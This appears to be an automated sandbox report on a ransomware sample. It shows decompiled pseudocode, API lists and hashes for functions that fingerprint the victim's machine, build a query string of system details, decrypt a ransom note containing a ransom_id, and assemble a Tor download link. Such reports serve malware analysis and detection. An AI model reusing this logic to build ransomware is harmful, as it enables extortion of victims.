String ID: iqt$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-671888634
Opcode ID: 015039a9b064f51fb91e0c2f909d5420a31506639d5490c08c0002272130d53b
Instruction ID: 53412c60a41c44321227648f10c9b3040b738eca471fe3a3609cadbdfe6f3744
Opcode Fuzzy Hash: 015039a9b064f51fb91e0c2f909d5420a31506639d5490c08c0002272130d53b
Instruction Fuzzy Hash: 5112B070A80309BFEB209FA1CC4AFAABBB5FF04B49F101529F641B6191DBB5B514CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FE67E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FE68024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FE6803D

Strings

e, xrefs: 0FE67F2D
, xrefs: 0FE67EC9
o, xrefs: 0FE67FBB
l, xrefs: 0FE67E79
7, xrefs: 0FE67F59
5, xrefs: 0FE67E8D
w, xrefs: 0FE67EBF
e, xrefs: 0FE67F91
A, xrefs: 0FE67F19
8, xrefs: 0FE67FEC
c, xrefs: 0FE67F9F
z, xrefs: 0FE67E6F
, xrefs: 0FE67EF1
6, xrefs: 0FE67EDD
5, xrefs: 0FE6800F
6, xrefs: 0FE67F05
p, xrefs: 0FE67F23
o, xrefs: 0FE67FA6
i, xrefs: 0FE68008
h, xrefs: 0FE67FB4
e, xrefs: 0FE67F37
a, xrefs: 0FE67FFA
T, xrefs: 0FE67ED3
., xrefs: 0FE67FD7
5, xrefs: 0FE67F52
O, xrefs: 0FE67EFB
M, xrefs: 0FE67E64
a, xrefs: 0FE67E83
a, xrefs: 0FE68001
., xrefs: 0FE67FD0
3, xrefs: 0FE67FE5
7, xrefs: 0FE68016
(, xrefs: 0FE67EA1
0, xrefs: 0FE67E97
, xrefs: 0FE67FF3
3, xrefs: 0FE67F60
G, xrefs: 0FE67F98
1, xrefs: 0FE67EE7
L, xrefs: 0FE67F7C
3, xrefs: 0FE6801D
5, xrefs: 0FE67FC9
t, xrefs: 0FE67F4B
i, xrefs: 0FE67EAB
8, xrefs: 0FE67FDE
K, xrefs: 0FE67F6E
i, xrefs: 0FE67F8A
T, xrefs: 0FE67F75
, xrefs: 0FE67F67
e, xrefs: 0FE67FC2
, xrefs: 0FE67F83
d, xrefs: 0FE67EB5
, xrefs: 0FE67FAD
), xrefs: 0FE67F0F
K, xrefs: 0FE67F41

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: bca458d6353cb41ee5b0361493a27f7c895f9abf0cc9346a457c1b16126c89d5
Instruction ID: fef4922f0f648e7051b5ff883e6c893e93f48a0c7e9ec15a3c5f8594ba664a3d
Opcode Fuzzy Hash: bca458d6353cb41ee5b0361493a27f7c895f9abf0cc9346a457c1b16126c89d5
Instruction Fuzzy Hash: 3D41B8B4811358DEEB21CF91999879EBFF6BB04748F50819EC5086B201C7F60A89CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FE670A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FE670A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

APIs

lstrcatW.KERNEL32(?,?), ref: 0FE670C1
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE670C9
lstrcatW.KERNEL32(?,?), ref: 0FE670D2
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE670DA
lstrcatW.KERNEL32(?,?), ref: 0FE670E5
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE670ED
lstrcatW.KERNEL32(?,?), ref: 0FE670F3
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE670FB
lstrcatW.KERNEL32(?,?), ref: 0FE67107
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE6710F
lstrcatW.KERNEL32(?,?), ref: 0FE67115
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE6711D
lstrcatW.KERNEL32(?,?), ref: 0FE67129
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE67131
lstrcatW.KERNEL32(?,?), ref: 0FE67137
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE6713F
lstrcatW.KERNEL32(?,?), ref: 0FE6714B
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE67153
lstrcatW.KERNEL32(?,?), ref: 0FE67159
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE67161
lstrcatW.KERNEL32(?,?), ref: 0FE6716D
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE67175
lstrcatW.KERNEL32(?,?), ref: 0FE6717B
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE67183
lstrcatW.KERNEL32(?,0FE64B36), ref: 0FE6718F
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE67197
lstrcatW.KERNEL32(?,?), ref: 0FE6719D
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE671A5
lstrcatW.KERNEL32(?,?), ref: 0FE671B1
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE671B9
lstrcatW.KERNEL32(?,?), ref: 0FE671BF
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE671C7
lstrcatW.KERNEL32(?,?), ref: 0FE671D3
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE671DB
lstrcatW.KERNEL32(?,?), ref: 0FE671E1
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE671E9
VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0FE64869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0FE671FC
wsprintfW.USER32 ref: 0FE67216
wsprintfW.USER32 ref: 0FE67227
lstrcatW.KERNEL32(?,?), ref: 0FE67234
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE6723C
lstrcatW.KERNEL32(?,?), ref: 0FE67242
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE6724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FE67256
lstrcatW.KERNEL32(?,?), ref: 0FE67266
lstrcatW.KERNEL32(?,0FE6FFD0), ref: 0FE6726E
lstrcatW.KERNEL32(?,?), ref: 0FE67274
lstrcatW.KERNEL32(?,0FE6FFD4), ref: 0FE6727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0FE64869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6727F

Strings

undefined, xrefs: 0FE67221
%x%x, xrefs: 0FE67210

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: deeebbe01f2aee4eda1b3fe341d53ed679c5c91f5ef888f97d948bdc77b470c4
Instruction ID: 0f957a7c9a228ca68e6d611144b994fcf7c8df19471639a7f6ce6b0f87d69e9c
Opcode Fuzzy Hash: deeebbe01f2aee4eda1b3fe341d53ed679c5c91f5ef888f97d948bdc77b470c4
Instruction Fuzzy Hash: 32514F3118669CB6CB233F619C49FDF3B19EFC6788F022161F9101405B9BA99252DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FE642B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0FE642B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xfe72a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0FE63BC0( &_v148);
				E0FE67490( &_v236, __edx); // executed
				_t97 = E0FE672A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0FE670A0( &_v152, _t98); // executed
				_t60 = E0FE681F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xfe70510]");
				_t77 = 0xfe72000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xfe72000) =  *(_t62 + 0xfe72000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xfe72a64 = 0xfe72000;
				_t94 = E0FE681F0(0xfe72000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xfe72a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xfe72a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0FE67D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xfe72000;
					_t69 =  *0xfe72000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xfe72000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

APIs

Part of subcall function 0FE63BC0: GetProcessHeap.KERNEL32(?,?,0FE64807,00000000,?,00000000,00000000), ref: 0FE63C5C

Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0FE674B7
Part of subcall function 0FE67490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FE674C8
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0FE674E6
Part of subcall function 0FE67490: GetComputerNameW.KERNEL32 ref: 0FE674F0
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FE67510
Part of subcall function 0FE67490: wsprintfW.USER32 ref: 0FE67551
Part of subcall function 0FE67490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FE6756E
Part of subcall function 0FE67490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FE67592
Part of subcall function 0FE67490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0FE64810,?), ref: 0FE675B6
Part of subcall function 0FE67490: RegCloseKey.KERNELBASE(00000000), ref: 0FE675D2

Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672F2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672FD
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67313
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6731E
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67334
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6733F
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67355
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(0FE64B36,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67360
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67376
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67381
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67397
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673A2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673C1
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673CC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64363
lstrcpyW.KERNEL32 ref: 0FE643E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE643E9

Strings

n, xrefs: 0FE644D5
o, xrefs: 0FE644DD
r, xrefs: 0FE644BD
r, xrefs: 0FE6449D
h, xrefs: 0FE6445D
l, xrefs: 0FE644FD
r, xrefs: 0FE64495
w, xrefs: 0FE6447D
o, xrefs: 0FE644CD
w, xrefs: 0FE644F5
d, xrefs: 0FE644ED
c, xrefs: 0FE644AD
t, xrefs: 0FE6448D
j, xrefs: 0FE644A5
t, xrefs: 0FE64465
{USERID}, xrefs: 0FE643BF, 0FE6440D, 0FE64413
., xrefs: 0FE64535
s, xrefs: 0FE6446D
-, xrefs: 0FE6450D
/, xrefs: 0FE64475
w, xrefs: 0FE64485
y, xrefs: 0FE6451D
ransom_id=, xrefs: 0FE64350, 0FE6435C
/, xrefs: 0FE644C5
m, xrefs: 0FE6452D
a, xrefs: 0FE64505
d, xrefs: 0FE644E5
., xrefs: 0FE644B5
a, xrefs: 0FE64515
h, xrefs: 0FE64525
n, xrefs: 0FE6453D

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 5561eaae9d1c95150cd9a4bd799220c340d808f6291a474518b638249ce5a119
Instruction ID: add3adfdddc489a323de47aed9a2c2fd5d2ed76a0db0aba1f561f90805c6ec8e
Opcode Fuzzy Hash: 5561eaae9d1c95150cd9a4bd799220c340d808f6291a474518b638249ce5a119
Instruction Fuzzy Hash: 107125B05843448BE730DF10D80977B7BE2FB81788F50591CF6855B2D2EBB99948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0FE643A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FE643A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xfe72000) =  *(_t41 + 0xfe72000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xfe72a64 = 0xfe72000;
				_t60 = E0FE681F0(0xfe72000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xfe72000;
						_t49 =  *0xfe72000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xfe72000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
